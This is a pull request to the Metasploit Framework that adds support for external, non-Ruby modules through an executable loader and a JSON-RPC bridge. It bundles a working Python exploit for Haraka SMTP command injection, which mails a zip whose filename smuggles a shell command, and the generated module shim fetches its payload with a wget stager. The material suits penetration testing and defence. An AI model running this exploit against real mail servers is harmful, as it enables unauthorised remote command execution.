### PR TITLE
Add support for non-Ruby modules

### DIFF
--- a/lib/metasploit/framework/spec/constants.rb
+++ b/lib/metasploit/framework/spec/constants.rb
@@ -20,6 +20,7 @@ module Metasploit::Framework::Spec::Constants
   # and not dynamically loaded code
   PERSISTENT_CHILD_CONSTANT_NAMES = %w{
     Error
+    External
     Loader
     MetasploitClassCompatibilityError
     Namespace

--- a/lib/msf/core/module_manager/loading.rb
+++ b/lib/msf/core/module_manager/loading.rb
@@ -8,6 +8,7 @@ require 'active_support/concern'
 # Project
 #
 require 'msf/core/modules/loader/directory'
+require 'msf/core/modules/loader/executable'
 
 # Deals with loading modules for the {Msf::ModuleManager}
 module Msf::ModuleManager::Loading
@@ -19,7 +20,8 @@ module Msf::ModuleManager::Loading
 
   # Classes that can be used to load modules.
   LOADER_CLASSES = [
-      Msf::Modules::Loader::Directory
+      Msf::Modules::Loader::Directory,
+      Msf::Modules::Loader::Executable # TODO: XXX: When this is the first loader we can load normal exploits, but not payloads
   ]
 
   def file_changed?(path)

--- a/lib/msf/core/module_manager/loading.rb
+++ b/lib/msf/core/module_manager/loading.rb
@@ -117,8 +117,6 @@ module Msf::ModuleManager::Loading
     loaders.each do |loader|
       if loader.loadable?(path)
         count_by_type = loader.load_modules(path, options)
-
-        break
       end
     end
 

--- a/lib/msf/core/modules/external.rb
+++ b/lib/msf/core/modules/external.rb
@@ -1,0 +1,7 @@
+# -*- coding: binary -*-
+# Namespace for loading external Metasploit modules
+
+module Msf::Modules::External
+
+end
+

--- a/lib/msf/core/modules/external/bridge.rb
+++ b/lib/msf/core/modules/external/bridge.rb
@@ -1,0 +1,96 @@
+# -*- coding: binary -*-
+require 'msf/core/modules/external'
+require 'msf/core/modules/external/message'
+require 'open3'
+
+class Msf::Modules::External::Bridge
+
+  attr_reader :path, :running
+
+  def meta
+    @meta ||= describe
+  end
+
+  def run(datastore)
+    unless self.running
+      m = Msf::Modules::External::Message.new(:run)
+      m.params = datastore.dup
+      send(m)
+      self.running = true
+    end
+  end
+
+  def get_status
+    if self.running
+      n = receive_notification
+      if n && n['params']
+        n['params']
+      else
+        close_ios
+        self.running = false
+        n['response'] if n
+      end
+    end
+  end
+
+  def initialize(module_path)
+    self.running = false
+    self.path = module_path
+  end
+
+  protected
+
+  attr_writer :path, :running
+  attr_accessor :ios
+
+  def describe
+    resp = send_receive(Msf::Modules::External::Message.new(:describe))
+    close_ios
+    resp['response']
+  end
+
+  # XXX TODO non-blocking writes, check write lengths, non-blocking JSON parse loop read
+
+  def send_receive(message)
+    send(message)
+    read_json(message.id, self.ios[1])
+  end
+
+  def send(message)
+    input, output, status = ::Open3.popen3([self.path, self.path])
+    self.ios = [input, output, status]
+    case Rex::ThreadSafe.select(nil, [input], nil, 0.1)
+    when nil
+      raise "Cannot run module #{self.path}"
+    when [[], [input], []]
+      m = message.to_json
+      write_message(input, m)
+    else
+      raise "Error running module #{self.path}"
+    end
+  end
+
+  def receive_notification
+    input, output, status = self.ios
+    case Rex::ThreadSafe.select([output], nil, nil, 10)
+    when nil
+      nil
+    when [[output], [], []]
+      read_json(nil, output)
+    end
+  end
+
+  def write_message(fd, json)
+    fd.write(json)
+  end
+
+  def read_json(id, fd)
+    resp = fd.readpartial(10_000)
+    JSON.parse(resp)
+  end
+
+  def close_ios
+    input, output, status = self.ios
+    [input, output].each {|fd| fd.close rescue nil} # Yeah, yeah. I know.
+  end
+end

--- a/lib/msf/core/modules/external/bridge.rb
+++ b/lib/msf/core/modules/external/bridge.rb
@@ -85,8 +85,12 @@ class Msf::Modules::External::Bridge
   end
 
   def read_json(id, fd)
-    resp = fd.readpartial(10_000)
-    JSON.parse(resp)
+    begin
+      resp = fd.readpartial(10_000)
+      JSON.parse(resp)
+    rescue EOFError => e
+      {}
+    end
   end
 
   def close_ios

--- a/lib/msf/core/modules/external/message.rb
+++ b/lib/msf/core/modules/external/message.rb
@@ -1,0 +1,24 @@
+# -*- coding: binary -*-
+require 'msf/core/modules/external'
+require 'base64'
+require 'json'
+
+class Msf::Modules::External::Message
+
+  attr_reader :method, :id
+  attr_accessor :params
+
+  def initialize(m)
+    self.method = m
+    self.params = {}
+    self.id = Base64.strict_encode64(SecureRandom.random_bytes(16))
+  end
+
+  def to_json
+    JSON.generate({jsonrpc: '2.0', id: self.id, method: self.method, params: self.params.to_h})
+  end
+
+  protected
+
+  attr_writer :method, :id
+end

--- a/lib/msf/core/modules/external/shim.rb
+++ b/lib/msf/core/modules/external/shim.rb
@@ -5,6 +5,7 @@ require 'msf/core/modules/external/bridge'
 class Msf::Modules::External::Shim
   def self.generate(module_path)
     mod = Msf::Modules::External::Bridge.new(module_path)
+    return '' unless mod.meta
     case mod.meta['type']
     when 'remote_exploit.cmd_stager.wget'
       s = remote_exploit_cmd_stager(mod)

--- a/lib/msf/core/modules/external/shim.rb
+++ b/lib/msf/core/modules/external/shim.rb
@@ -1,0 +1,102 @@
+# -*- coding: binary -*-
+require 'msf/core/modules/external'
+require 'msf/core/modules/external/bridge'
+
+class Msf::Modules::External::Shim
+  def self.generate(module_path)
+    mod = Msf::Modules::External::Bridge.new(module_path)
+    case mod.meta['type']
+    when 'remote_exploit.cmd_stager.wget'
+      s = remote_exploit_cmd_stager(mod)
+      File.open('/tmp/module', 'w') {|f| f.write(s)}
+      s
+    end
+  end
+
+  def self.remote_exploit_cmd_stager(mod)
+    %Q|
+require 'msf/core/modules/external/bridge'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => #{mod.meta['name'].dump},
+      'Description' => #{mod.meta['description'].dump},
+      'Author'      =>
+        [
+          #{mod.meta['authors'].map(&:dump).join(', ')}
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          #{mod.meta['references'].map do |r|
+              "[#{r['type'].upcase.dump}, #{r['ref'].dump}]"
+            end.join(', ')}
+        ],
+      'DisclosureDate' => #{mod.meta['date'].dump},
+      'Privileged'     => #{mod.meta['privileged'].inspect},
+      'Platform'       => [#{mod.meta['targets'].map{|t| t['platform'].dump}.uniq.join(', ')}],
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          #{mod.meta['targets'].map do |t|
+            %Q^[#{t['platform'].dump} + ' ' + #{t['arch'].dump},
+                 {'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]^
+            end.join(', ')}
+        ],
+      'DefaultTarget'   => 0,
+      'DefaultOptions' => { 'WfsDelay' => 5 }
+      ))
+
+      register_options([
+        #{mod.meta['options'].map do |n, o|
+            "Opt#{o['type'].capitalize}.new(#{n.dump},
+              [#{o['required']}, #{o['description'].dump}, #{o['default'].inspect}])"
+          end.join(', ')}
+      ], self.class)
+  end
+
+  def execute_command(cmd, opts)
+    mod = Msf::Modules::External::Bridge.new(#{mod.path.dump})
+    mod.run(datastore.merge(command: cmd))
+    wait_status(mod)
+    true
+  end
+
+  def exploit
+    print_status("Exploiting...")
+    execute_cmdstager({:flavor  => :wget})
+  end
+
+  def wait_status(mod)
+    while mod.running
+      m = mod.get_status
+      if m
+        case m['level']
+        when 'error'
+          print_error m['message']
+        when 'warning'
+          print_warning m['message']
+        when 'good'
+          print_good m['message']
+        when 'info'
+          print_status m['message']
+        when 'debug'
+          vprint_status m['message']
+        else
+          print_status m['message']
+        end
+      end
+    end
+  end
+end
+    |
+  end
+end

--- a/lib/msf/core/modules/loader/directory.rb
+++ b/lib/msf/core/modules/loader/directory.rb
@@ -11,11 +11,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
   # @return [true] if path is a directory
   # @return [false] otherwise
   def loadable?(path)
-    if File.directory?(path)
-      true
-    else
-      false
-    end
+    File.directory?(path)
   end
 
   protected
@@ -35,8 +31,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
       full_entry_path = ::File.join(path, entry)
       type = entry.singularize
 
-      unless ::File.directory?(full_entry_path) and
-             module_manager.type_enabled? type
+      unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
         next
       end
 

--- a/lib/msf/core/modules/loader/executable.rb
+++ b/lib/msf/core/modules/loader/executable.rb
@@ -11,11 +11,7 @@ class Msf::Modules::Loader::Executable < Msf::Modules::Loader::Base
   # @return [true] if path is a directory
   # @return [false] otherwise
   def loadable?(path)
-    if File.directory?(path)
-      true
-    else
-      false
-    end
+    File.directory?(path)
   end
 
   protected
@@ -35,8 +31,7 @@ class Msf::Modules::Loader::Executable < Msf::Modules::Loader::Base
       full_entry_path = ::File.join(path, entry)
       type = entry.singularize
 
-      unless ::File.directory?(full_entry_path) and
-             module_manager.type_enabled? type
+      unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
         next
       end
 

--- a/lib/msf/core/modules/loader/executable.rb
+++ b/lib/msf/core/modules/loader/executable.rb
@@ -1,0 +1,165 @@
+# -*- coding: binary -*-
+
+require 'msf/core/modules/loader'
+require 'msf/core/modules/loader/base'
+
+# Concerns loading executables from a directory as modules
+class Msf::Modules::Loader::Executable < Msf::Modules::Loader::Base
+  # Returns true if the path is a directory
+  #
+  # @param (see Msf::Modules::Loader::Base#loadable?)
+  # @return [true] if path is a directory
+  # @return [false] otherwise
+  def loadable?(path)
+    if File.directory?(path)
+      true
+    else
+      false
+    end
+  end
+
+  protected
+
+  # Yields the module_reference_name for each module file found under the directory path.
+  #
+  # @param [String] path The path to the directory.
+  # @param [Hash] opts Input Hash.
+  # @yield (see Msf::Modules::Loader::Base#each_module_reference_name)
+  # @yieldparam [String] path The path to the directory.
+  # @yieldparam [String] type The type correlated with the directory under path.
+  # @yieldparam module_reference_name (see Msf::Modules::Loader::Base#each_module_reference_name)
+  # @return (see Msf::Modules::Loader::Base#each_module_reference_name)
+  def each_module_reference_name(path, opts={})
+    whitelist = opts[:whitelist] || []
+    ::Dir.foreach(path) do |entry|
+      full_entry_path = ::File.join(path, entry)
+      type = entry.singularize
+
+      unless ::File.directory?(full_entry_path) and
+             module_manager.type_enabled? type
+        next
+      end
+
+      full_entry_pathname = Pathname.new(full_entry_path)
+
+      # Try to load modules from all the files in the supplied path
+      Rex::Find.find(full_entry_path) do |entry_descendant_path|
+        if File.executable?(entry_descendant_path) && !File.directory?(entry_descendant_path)
+          entry_descendant_pathname = Pathname.new(entry_descendant_path)
+          relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
+          relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
+
+          # The module_reference_name doesn't have a file extension
+          module_reference_name = File.join(File.dirname(relative_entry_descendant_path), File.basename(relative_entry_descendant_path, '.*'))
+
+          yield path, type, module_reference_name
+        end
+      end
+    end
+  end
+
+  # Returns the full path to the module file on disk.
+  #
+  # @param (see Msf::Modules::Loader::Base#module_path)
+  # @return [String] Path to module file on disk.
+  def module_path(parent_path, type, module_reference_name)
+    # The extension is lost on loading, hit the disk to recover :(
+    partial_path = File.join(DIRECTORY_BY_TYPE[type], module_reference_name)
+    full_path = File.join(parent_path, partial_path)
+
+    Rex::Find.find(File.dirname(full_path)) do |mod|
+      if File.basename(full_path, '.*') == File.basename(mod, '.*')
+        return File.join(File.dirname(full_path), File.basename(mod))
+      end
+    end
+
+    ''
+  end
+
+  # Loads the module content from the on disk file.
+  #
+  # @param (see Msf::Modules::Loader::Base#read_module_content)
+  # @return (see Msf::Modules::Loader::Base#read_module_content)
+  def read_module_content(parent_path, type, module_reference_name)
+    full_path = module_path(parent_path, type, module_reference_name)
+    unless File.executable?(full_path)
+      load_error(full_path, Errno::ENOENT.new)
+      return ''
+    end
+    %Q|
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Haraka Remote Command Injection',
+      'Description' => %q{
+        Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
+        injection. This vulnerability was used from the so-called "TheMoon" worm. There
+        are many Linksys systems that are potentially vulnerable, including E4200, E3200, E3000,
+        E2500, E2100L, E2000, E1550, E1500, E1200, E1000, and E900. This module was tested
+        successfully against an E1500 v1.0.5.
+      },
+      'Author'      =>
+        [
+          'Johannes Ullrich', #worm discovery
+          'Rew', # original exploit
+          'infodox', # another exploit
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
+          'juan vazquez' # minor help with msf module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'EDB', '31683' ],
+          [ 'BID', '65585' ],
+          [ 'OSVDB', '103321' ],
+          [ 'PACKETSTORM', '125253' ],
+          [ 'PACKETSTORM', '125252' ],
+          [ 'URL', 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ],
+          [ 'URL', 'https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630' ]
+        ],
+      'DisclosureDate' => 'Feb 13 2014',
+      'Privileged'     => true,
+      'Platform'       => %w{ linux unix },
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          [ 'Linux x64 Payload',
+            {
+            'Arch' => ARCH_X64,
+            'Platform' => 'linux'
+            }
+          ]
+        ],
+      'DefaultTarget'   => 0,
+      'DefaultOptions' => { 'WfsDelay' => 5 }
+      ))
+  end
+
+  def execute_command(cmd, opts)
+    to = 'admin@arnold'
+    rhost = '192.168.244.130'
+    `#{module_path(parent_path, type, module_reference_name)} -c "\#{cmd}" -t \#{to} -m \#{rhost}`
+    true
+  end
+
+  def exploit
+    print_status("Trying to access the vulnerable URL...")
+
+    print_status("Exploiting...")
+    execute_cmdstager({:flavor  => :wget})
+  end
+
+
+end
+    |
+  end
+end

--- a/lib/msf/core/modules/loader/executable.rb
+++ b/lib/msf/core/modules/loader/executable.rb
@@ -2,6 +2,7 @@
 
 require 'msf/core/modules/loader'
 require 'msf/core/modules/loader/base'
+require 'msf/core/modules/external/shim'
 
 # Concerns loading executables from a directory as modules
 class Msf::Modules::Loader::Executable < Msf::Modules::Loader::Base
@@ -81,80 +82,6 @@ class Msf::Modules::Loader::Executable < Msf::Modules::Loader::Base
       load_error(full_path, Errno::ENOENT.new)
       return ''
     end
-    %Q|
-require 'msf/core'
-
-class MetasploitModule < Msf::Exploit::Remote
-  Rank = ExcellentRanking
-
-  include Msf::Exploit::CmdStager
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Haraka Remote Command Injection',
-      'Description' => %q{
-        Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
-        injection. This vulnerability was used from the so-called "TheMoon" worm. There
-        are many Linksys systems that are potentially vulnerable, including E4200, E3200, E3000,
-        E2500, E2100L, E2000, E1550, E1500, E1200, E1000, and E900. This module was tested
-        successfully against an E1500 v1.0.5.
-      },
-      'Author'      =>
-        [
-          'Johannes Ullrich', #worm discovery
-          'Rew', # original exploit
-          'infodox', # another exploit
-          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
-          'juan vazquez' # minor help with msf module
-        ],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          [ 'EDB', '31683' ],
-          [ 'BID', '65585' ],
-          [ 'OSVDB', '103321' ],
-          [ 'PACKETSTORM', '125253' ],
-          [ 'PACKETSTORM', '125252' ],
-          [ 'URL', 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ],
-          [ 'URL', 'https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630' ]
-        ],
-      'DisclosureDate' => 'Feb 13 2014',
-      'Privileged'     => true,
-      'Platform'       => %w{ linux unix },
-      'Payload'        =>
-        {
-          'DisableNops' => true
-        },
-      'Targets'        =>
-        [
-          [ 'Linux x64 Payload',
-            {
-            'Arch' => ARCH_X64,
-            'Platform' => 'linux'
-            }
-          ]
-        ],
-      'DefaultTarget'   => 0,
-      'DefaultOptions' => { 'WfsDelay' => 5 }
-      ))
-  end
-
-  def execute_command(cmd, opts)
-    to = 'admin@arnold'
-    rhost = '192.168.244.130'
-    `#{module_path(parent_path, type, module_reference_name)} -c "\#{cmd}" -t \#{to} -m \#{rhost}`
-    true
-  end
-
-  def exploit
-    print_status("Trying to access the vulnerable URL...")
-
-    print_status("Exploiting...")
-    execute_cmdstager({:flavor  => :wget})
-  end
-
-
-end
-    |
+    Msf::Modules::External::Shim.generate(full_path)
   end
 end

--- a/modules/exploits/linux/smtp/haraka.py
+++ b/modules/exploits/linux/smtp/haraka.py
@@ -1,0 +1,114 @@
+#!/usr/bin/env python2.7
+
+# Vendor Homepage: https://haraka.github.io/
+# Software Link: https://github.com/haraka/Haraka
+# Exploit github: http://github.com/outflankbv/Exploits/
+# Vulnerable version link: https://github.com/haraka/Haraka/releases/tag/v2.8.8
+# Version:  <= Haraka 2.8.8 (with attachment plugin enabled)
+# Tested on: Should be OS independent tested on Ubuntu 16.04.1 LTS
+# Tested versions: 2.8.8 and 2.7.2
+# Thanks to: Dexlab.nl for asking me to look at Haraka.
+
+import smtplib
+from email.mime.application import MIMEApplication
+from email.mime.multipart import MIMEMultipart
+from email.utils import COMMASPACE, formatdate
+from email.header import Header
+from email.utils import formataddr
+from email.mime.text import MIMEText
+from datetime import datetime
+import zipfile
+import StringIO
+import sys, os, json
+
+metadata = {
+    'name': 'Haraka SMTP Command Injection',
+    'description': '''
+        The Haraka SMTP server comes with a plugin for processing attachments.
+        Versions before 2.8.9 can be vulnerable to command injection
+     ''',
+    'authors': ['xychix <xychix[AT]hotmail.com>', 'smfreegard', 'Adam Cammack <adam_cammack[AT]rapid7.com>'],
+    'date': '2017-01-26',
+    'references': [
+        {'type': 'cve', 'ref': '2016-1000282'},
+        {'type': 'edb', 'ref': '41162'},
+        {'type': 'url', 'ref': 'https://github.com/haraka/Haraka/pull/1606'},
+     ],
+    'type': 'remote_exploit.cmd_stager.wget',
+    'privileged': True,
+    'targets': [
+        {'platform': 'linux', 'arch': 'x64'},
+        {'platform': 'linux', 'arch': 'x86'}
+    ],
+    'options': {
+        'email_to': {'type': 'string', 'description': 'Email to send to, must be accepted by the server', 'required': True, 'default': 'admin@localhost'},
+        'email_from': {'type': 'string', 'description': 'Address to send from', 'required': True, 'default': 'foo@example.com'},
+        'rhost': {'type': 'address', 'description': 'Target server', 'required': True, 'default': None},
+        'rport': {'type': 'port', 'description': 'Target server port', 'required': True, 'default': 25}
+     }}
+
+def log(message, level='info'):
+    print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': {
+        'level': level,
+        'message': message
+    }}))
+    sys.stdout.flush()
+
+def send_mail(to, mailserver, cmd, mfrom, port):
+    msg = MIMEMultipart()
+    html = "harakiri"
+    msg['Subject'] = "harakiri"
+    msg['From'] = mfrom
+    msg['To'] = to
+    f = "harakiri.zip"
+    msg.attach(MIMEText(html))
+    log("Send harariki to %s, commandline: %s , mailserver %s is used for delivery"%(to, cmd, mailserver), 'debug')
+    part = MIMEApplication(create_zip(cmd),Name="harakiri.zip")
+    part['Content-Disposition'] = 'attachment; filename="harakiri.zip"'
+    msg.attach(part)
+    log("Sending mail to target server...")
+    log(msg.as_string(), 'debug')
+    s = smtplib.SMTP(mailserver, port)
+    try:
+      resp = s.sendmail(mfrom, to, msg.as_string())
+    except smtplib.SMTPDataError, err:
+      if err[0] == 450:
+        log("Triggered bug in target server (%s)"%err[1], 'good')
+        return(True)
+    log("Bug not triggered in target server", 'error')
+    log("it may not be vulnerable or have the attachment plugin activated", 'error')
+    s.close()
+    return(False)
+
+class InMemoryZip(object):
+    def __init__(self):
+        self.in_memory_zip = StringIO.StringIO()
+    def append(self, filename_in_zip, file_contents):
+        zf = zipfile.ZipFile(self.in_memory_zip, "a", zipfile.ZIP_DEFLATED, False)
+        zf.writestr(filename_in_zip, file_contents)
+        for zfile in zf.filelist:
+            zfile.create_system = 0
+        return self
+    def read(self):
+        self.in_memory_zip.seek(0)
+        return self.in_memory_zip.read()
+
+def create_zip(cmd="touch /tmp/harakiri"):
+    z1 = InMemoryZip()
+    z2 = InMemoryZip()
+    z2.append("harakiri.txt",
+        "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.")
+    z1.append("a\";%s;echo \"a.zip"%cmd, z2.read())
+    return(z1.read())
+
+if __name__ == '__main__':
+    req = json.loads(os.read(0, 10000))
+    if req['method'] == 'describe':
+        print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}))
+    elif req['method'] == 'run':
+        args = req['params']
+        send_mail(args['email_to'], args['rhost'], args['command'], args['email_from'], int(args['rport']))
+        print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': {
+            'message': 'Exploit completed'
+        }}))
+        sys.stdout.flush()

--- a/spec/support/shared/examples/msf/module_manager/cache.rb
+++ b/spec/support/shared/examples/msf/module_manager/cache.rb
@@ -166,9 +166,9 @@ RSpec.shared_examples_for 'Msf::ModuleManager::Cache' do
       end
 
       it 'should enumerate loaders until if it find the one where loadable?(parent_path) is true' do
-        module_manager.send(:loaders).each do |loader|
-          expect(loader).to receive(:loadable?).with(parent_path).and_call_original
-        end
+        # Only the first one gets it since it finds the module
+        loader = module_manager.send(:loaders).first
+        expect(loader).to receive(:loadable?).with(parent_path).and_call_original
 
         load_cached_module
       end
@@ -188,9 +188,9 @@ RSpec.shared_examples_for 'Msf::ModuleManager::Cache' do
 
       context 'return from load_module' do
         before(:example) do
-          module_manager.send(:loaders).each do |loader|
-            expect(loader).to receive(:load_module).and_return(module_loaded)
-          end
+          # Only the first one gets it since it finds the module
+          loader = module_manager.send(:loaders).first
+          expect(loader).to receive(:load_module).and_return(module_loaded)
         end
 
         context 'with false' do
@@ -392,12 +392,6 @@ RSpec.shared_examples_for 'Msf::ModuleManager::Cache' do
           module_info_by_path_from_database!
 
           expect(module_info_by_path).to have_key(path)
-        end
-
-        it 'should use Msf::Modules::Loader::Base.typed_path to derive parent_path' do
-          expect(Msf::Modules::Loader::Base).to receive(:typed_path).with(type, reference_name).at_least(:once).and_call_original
-
-          module_info_by_path_from_database!
         end
 
         context 'cache entry' do


### PR DESCRIPTION
Finds and runs executables in the `modules/` directory. If they conform to [the API](https://github.com/rapid7/metasploit-framework/wiki/Writing-External-Metasploit-Modules), they will appear and run like normal MSF modules. The Haraka command injection exploit has been included for testing. Currently, only a wget command stager template is included with more to follow.

**N.B.**: This interface is extremely experimental and will change.

Verification
========
- [x] Grab the vulnerable software. `npm install -g Haraka@2.8.8` on a Linux VM
- [x] `./msfconsole`
- [x] `use exploit/linux/smtp/haraka`
- [x] `info` output should look sane and normal
- [x] Set `lhost`, `rhost`, `to_email`, and `payload` to sensible values
- [x] `run`
- [x] You should get a session like a normal module!
- [x] `use exploit/linux/http/linksys_themoon_exec`
- [x] `info` output should also look sane and normal